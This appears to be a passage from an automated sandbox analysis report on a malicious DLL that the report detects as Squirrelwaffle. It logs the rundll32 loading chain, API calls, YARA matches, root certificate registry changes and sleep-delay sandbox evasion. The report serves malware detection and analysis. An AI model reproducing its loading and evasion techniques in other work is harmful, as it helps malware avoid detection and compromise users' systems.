                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04570C643_2_04570C64
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_045709F43_2_045709F4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00946354 appears 48 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968354 NtdllDefWindowProc_A,3_2_00968354
                  Source: p2SijKiqgZ.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                  Source: p2SijKiqgZ.dllReversingLabs: Detection: 15%
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll'
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER920C.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winDLL@6/10@207/6
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00948554 GetDiskFreeSpaceA,3_2_00948554
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00960800 GetLastError,FormatMessageA,3_2_00960800
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6688
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00959220 FindResourceA,LoadResource,SizeofResource,LockResource,3_2_00959220
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
                  Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shlwapi.pdb{ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdbt source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: wsspicli.pdbc source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: winspool.pdbe source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb# source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cryptbase.pdbw source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sechost.pdbi source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\Dll1\Release\Dll1.pdb source: loaddll32.exe, 00000000.00000002.518246060.0000000002A70000.00000040.00000001.sdmp, rundll32.exe
                  Source: Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
                  Source: Binary string: advapi32.pdb_ source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
                  Source: Binary string: netutils.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp

                  Data Obfuscation:

                  barindex
                  Yara detected SquirrelwaffleShow sources
                  Source: Yara matchFile source: 0.2.loaddll32.exe.2630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4590000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.2a70184.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.9b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4570184.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.45a0000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.4590000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.45a0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.0.rundll32.exe.4570184.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.515938362.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.253813077.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.284559646.0000000004590000.00000040.00000001.sdmp, type: MEMORY
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B213EC push ecx; ret 0_3_03B213ED
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B22371 push FFFFFFC0h; ret 0_3_03B2237D
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B25282 push edi; ret 0_3_03B25287
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B28022 push cs; ret 0_3_03B2802D
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B28070 push cs; ret 0_3_03B2807E
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B25776 push ebx; ret 0_3_03B25777
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B274B8 push esp; ret 0_3_03B274C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_03B2BBF7 push esi; retf 0_3_03B2BC3F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009470A4 push 009470D0h; ret 3_2_009470C8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009460F8 push 00946124h; ret 3_2_0094611C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096811C push 00968175h; ret 3_2_0096816D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0095414C push 00954199h; ret 3_2_00954191
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00946170 push 0094619Ch; ret 3_2_00946194
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00965170 push 0096519Ch; ret 3_2_00965194
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D28C push 0094D408h; ret 3_2_0094D400
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0095421C push 00954248h; ret 3_2_00954240
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00965264 push 00965290h; ret 3_2_00965288
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D48C push 0094D4B8h; ret 3_2_0094D4B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0094D40C push 0094D47Bh; ret 3_2_0094D473
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A584 push 0096A5F9h; ret 3_2_0096A5F1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A5FC push 0096A655h; ret 3_2_0096A64D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097062C push ecx; mov dword ptr [esp], ecx3_2_00970630
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00968794 push 009687D7h; ret 3_2_009687CF
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00969798 push 009697C4h; ret 3_2_009697BC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009537F0 push 00953898h; ret 3_2_00953890
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096974C push 0096978Eh; ret 3_2_00969786
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00953778 push 009537EEh; ret 3_2_009537E6
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097B760 push ecx; mov dword ptr [esp], edx3_2_0097B764
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009688D8 push 00968904h; ret 3_2_009688FC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009678E0 push 0096792Fh; ret 3_2_00967927
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096880C push 00968838h; ret 3_2_00968830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00967154
                  Source: C:\Windows\System32\loaddll32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096549C IsIconic,GetWindowPlacement,GetWindowRect,3_2_0096549C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009756F4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,3_2_009756F4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00974E40 CreateIconFromResourceEx,IsIconic,GetCapture,SetActiveWindow,DrawStateW,3_2_00974E40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00975F74 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,3_2_00975F74
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00967154 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SendMessageA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,EndDeferWindowPos,GetProcAddress,BeginDeferWindowPos,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00967154
                  Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Contains functionality to detect sleep reduction / modificationsShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A4843_2_0096A484
                  Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0096A4843_2_0096A484
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00960D90 GetSystemInfo,GetKeyState,3_2_00960D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009452FC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_009452FC
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30586Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41872Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41905Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32350Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34986Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31654Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31970Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33700Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38480Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33485Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43832Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42267Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33837Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32078Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37513Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38304Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31708Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39889Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32221Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32723Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38299Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 44379Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43297Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41668Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30142Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40381Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37021Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30435Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41835Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34687Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37017Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36437Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39186Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34553Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36196Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41187Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43835Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41523Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34936Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37574Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43310Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33772Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32630Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42429Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31133Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40873Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 33556Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 39879Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 34810Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42545Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37678Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 40066Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31485Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 38215Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42541Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32767Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 32836Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37699Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 43190Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 36106Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37489Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30692Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 31496Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 37661Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 42750Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 41555Jump to behavior
